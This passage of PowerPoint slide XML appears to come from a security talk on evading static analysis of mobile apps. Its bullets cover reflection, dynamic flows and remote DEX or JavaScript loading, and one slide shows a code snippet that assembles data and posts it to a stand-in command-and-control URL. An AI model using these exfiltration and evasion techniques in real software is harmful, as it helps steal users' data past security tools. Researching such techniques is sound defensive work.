                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Menlo-Regular" charset="0"/>
              </a:rPr>
              <a:t>data.charAt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Menlo-Regular" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Menlo-Regular" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Menlo-Regular" charset="0"/>
              </a:rPr>
              <a:t>) == </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0F7001"/>
                </a:solidFill>
                <a:latin typeface="Menlo-Bold" charset="0"/>
              </a:rPr>
              <a:t>'b'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Menlo-Regular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fr-FR" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Menlo-Regular" charset="0"/>
              </a:rPr>
              <a:t>        data2 += </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0F7001"/>
                </a:solidFill>
                <a:latin typeface="Menlo-Bold" charset="0"/>
              </a:rPr>
              <a:t>'b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0F7001"/>
                </a:solidFill>
                <a:latin typeface="Menlo-Bold" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Menlo-Regular" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Menlo-Regular" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Menlo-Regular" charset="0"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
              <a:latin typeface="Menlo-Regular" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Menlo-Regular" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Menlo-Regular" charset="0"/>
              </a:rPr>
              <a:t>PostRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Menlo-Regular" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0F7001"/>
                </a:solidFill>
                <a:latin typeface="Menlo-Bold" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="386EFF"/>
                </a:solidFill>
                <a:latin typeface="Menlo-Bold" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.remote.cnc/data.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0F7001"/>
                </a:solidFill>
                <a:latin typeface="Menlo-Bold" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" u="sng" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Menlo-Regular" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>, data2);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="292929"/>
              </a:solidFill>
              <a:latin typeface="Courier New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0931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Bypassing Static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Exploiting the Static Analysis FP/FN tradeoff</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Arrays, files, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dynamic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>flows</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Dynamic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reflection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remote </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DEX/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>apk</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTML &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JavaScript (also applicable for iOS)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-443753" y="2262107"/>
            <a:ext cx="161365" cy="279398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061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/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="524436" y="3334871"/>
            <a:ext cx="2040366" cy="2501153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8849" y="100036"/>
            <a:ext cx="8765151" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bypassing Advanced Techniques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765360" y="3704203"/>
            <a:ext cx="1122431" cy="1879830"/>
            <a:chOff x="2266051" y="1450709"/>
            <a:chExt cx="2198318" cy="3681709"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Rectangle 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2266051" y="1468556"/>
              <a:ext cx="2198318" cy="366386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rapezoid 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="2582053" y="1450709"/>
              <a:ext cx="1566316" cy="1686284"/>
            </a:xfrm>
            <a:prstGeom prst="trapezoid">
              <a:avLst>
                <a:gd name="adj" fmla="val 23881"/>
              </a:avLst>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="59000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="74000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="41000">
                  <a:srgbClr val="FFFFFF">
                    <a:alpha val="74000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="39000">
                  <a:srgbClr val="FFFFFF">
                    <a:alpha val="67000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="61000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="67000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="0">
                  <a:schemeClr val="bg1">
                    <a:alpha val="0"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="50000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="92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ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:softEdge rad="139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Delay 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="2731399" y="3125209"/>
              <a:ext cx="1267622" cy="825036"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX1" fmla="*/ 423971 w 847941"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX2" fmla="*/ 847942 w 847941"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825035"/>
                <a:gd name="connsiteX3" fmla="*/ 423971 w 847941"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825035"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825035"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX0" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 468467 w 892438"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 892438 w 892438"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 468467 w 892438"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 496576 w 920547"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 920547 w 920547"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 496576 w 920547"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 496576 w 1267622"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 1267622 w 1267622"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 496576 w 1267622"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825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7622" h="825036">
                  <a:moveTo>
                    <a:pt x="72605" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="496576" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="730729" y="0"/>
                    <a:pt x="1267622" y="184691"/>
                    <a:pt x="1267622" y="412518"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1267622" y="640345"/>
                    <a:pt x="730729" y="825036"/>
                    <a:pt x="496576" y="825036"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="72605" y="825035"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="-20837" y="550023"/>
                    <a:pt x="-27511" y="248315"/>
                    <a:pt x="7260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1"/>
                </a:gs>
                <a:gs pos="42000">
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="59000">
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="tx1"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="0"/>
              <a:tileRect/>
            </a:gradFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="50800">
                <a:schemeClr val="bg1">
                  <a:alpha val="2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2671935" y="1503488"/>
              <a:ext cx="1386550" cy="1506594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alpha val="0"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="tx1">
                    <a:alpha val="74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Delay 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="2735708" y="3307844"/>
              <a:ext cx="1259004" cy="451151"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX1" fmla="*/ 423971 w 847941"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX2" fmla="*/ 847942 w 847941"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825035"/>
                <a:gd name="connsiteX3" fmla="*/ 423971 w 847941"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825035"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825035"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX0" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 468467 w 892438"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 892438 w 892438"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 468467 w 892438"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 496576 w 920547"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 920547 w 920547"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 496576 w 920547"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 496576 w 1267622"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 1267622 w 1267622"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 496576 w 1267622"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 95168 w 1290185"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 519139 w 1290185"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 1290185 w 1290185"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 519139 w 1290185"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 55122 w 1290185"/>
                <a:gd name="connsiteY4" fmla="*/ 825034 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 95168 w 1290185"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 72607 w 1307667"/>
                <a:gd name="connsiteY0" fmla="*/ 1 h 825038"/>
                <a:gd name="connsiteX1" fmla="*/ 536621 w 1307667"/>
                <a:gd name="connsiteY1" fmla="*/ 2 h 825038"/>
                <a:gd name="connsiteX2" fmla="*/ 1307667 w 1307667"/>
                <a:gd name="connsiteY2" fmla="*/ 412520 h 825038"/>
                <a:gd name="connsiteX3" fmla="*/ 536621 w 1307667"/>
                <a:gd name="connsiteY3" fmla="*/ 825038 h 825038"/>
                <a:gd name="connsiteX4" fmla="*/ 72604 w 1307667"/>
                <a:gd name="connsiteY4" fmla="*/ 825036 h 825038"/>
                <a:gd name="connsiteX5" fmla="*/ 72607 w 1307667"/>
                <a:gd name="connsiteY5" fmla="*/ 1 h 825038"/>
                <a:gd name="connsiteX0" fmla="*/ 58234 w 1293294"/>
                <a:gd name="connsiteY0" fmla="*/ -1 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 522248 w 1293294"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 1293294 w 1293294"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 522248 w 1293294"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 58231 w 1293294"/>
                <a:gd name="connsiteY4" fmla="*/ 825034 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 58234 w 1293294"/>
                <a:gd name="connsiteY5" fmla="*/ -1 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 42588 w 1277648"/>
                <a:gd name="connsiteY0" fmla="*/ 1 h 825038"/>
                <a:gd name="connsiteX1" fmla="*/ 506602 w 1277648"/>
                <a:gd name="connsiteY1" fmla="*/ 2 h 825038"/>
                <a:gd name="connsiteX2" fmla="*/ 1277648 w 1277648"/>
                <a:gd name="connsiteY2" fmla="*/ 412520 h 825038"/>
                <a:gd name="connsiteX3" fmla="*/ 506602 w 1277648"/>
                <a:gd name="connsiteY3" fmla="*/ 825038 h 825038"/>
                <a:gd name="connsiteX4" fmla="*/ 42585 w 1277648"/>
                <a:gd name="connsiteY4" fmla="*/ 825036 h 825038"/>
                <a:gd name="connsiteX5" fmla="*/ 42588 w 1277648"/>
                <a:gd name="connsiteY5" fmla="*/ 1 h 825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77648" h="825038">
                  <a:moveTo>
                    <a:pt x="42588" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="506602" y="2"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="740755" y="2"/>
                    <a:pt x="1277648" y="184693"/>
                    <a:pt x="1277648" y="412520"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1277648" y="640347"/>
                    <a:pt x="740755" y="825038"/>
                    <a:pt x="506602" y="825038"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="42585" y="825036"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="-10810" y="550025"/>
                    <a:pt x="-17482" y="248315"/>
                    <a:pt x="42588" y="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1"/>
                </a:gs>
                <a:gs pos="42000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="51000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="59000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="32000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="tx1"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
              <a:tileRect/>
            </a:gradFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow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6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3124930" y="3941265"/>
              <a:ext cx="480561" cy="1191153"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1074587 h 1074587"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1074587 h 1074587"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1092385 h 1092385"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1092385 h 1092385"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 30034 h 1104621"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 30034 h 1104621"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1104621 h 1104621"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1104621 h 1104621"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 30034 h 1104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0561" h="1104621">
                  <a:moveTo>
                    <a:pt x="0" y="30034"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="160187" y="-10012"/>
                    <a:pt x="320374" y="-10012"/>
                    <a:pt x="480561" y="30034"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="480561" y="1104621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1104621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="30034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glow rad="50800">
                <a:schemeClr val="bg1">
                  <a:alpha val="2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Stored Data 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="3284980" y="2889707"/>
              <a:ext cx="160460" cy="825038"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 10000 w 10000"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 8333 w 10000"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 10000 w 10000"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 10000"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX0" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 9759 w 11426"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 11426"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX0" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 8333 w 11426"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 11426"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY6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26" h="10000">
                  <a:moveTo>
                    <a:pt x="3093" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="11426" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10505" y="0"/>
                    <a:pt x="8333" y="2239"/>
                    <a:pt x="8333" y="5000"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8333" y="7761"/>
                    <a:pt x="10505" y="10000"/>
                    <a:pt x="11426" y="10000"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3093" y="10000"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2172" y="10000"/>
